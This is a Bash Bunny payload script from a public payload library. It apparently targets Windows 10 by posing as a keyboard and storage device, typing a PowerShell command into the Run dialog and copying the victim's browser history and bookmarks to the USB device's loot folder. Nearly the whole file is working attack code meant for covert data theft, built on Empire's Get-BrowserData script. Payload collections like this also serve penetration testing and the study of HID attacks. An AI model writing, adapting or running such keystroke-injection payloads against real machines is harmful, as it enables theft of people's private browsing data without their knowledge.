bashbunny-payloads/payloads/library/exfiltration/browserData/payload.txt

#!/bin/bash
#
# Title:         BrowserData
# Author:        zachstanford
# Version:       0.1 (Tested on Windows 10)
#
# Dumps browser info like history and bookmarks from  powershell script 
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
# Credits to this Empire's powershell script:
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1

#script 
# Blue...............Running Script
# Purple.............Finished

# Not sure if this is the right variable. Feel free to change it.

ATTACKMODE HID STORAGE

GET SWITCH_POSITION

LED R SLOW
LOOTDIR=/root/udisk/loot/BrowserData
mkdir -p $LOOTDIR


LED B SLOW

# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING  "powershell \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Get-BrowserData.ps1'); $bunny =(gwmi win32_volume -f ’label=‘’BashBunny’’' |  Select-Object -ExpandProperty DriveLetter); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt\""
Q ENTER
Q DELAY 2000
Q STRING exit
Q ENTER
sync
LED M SLOW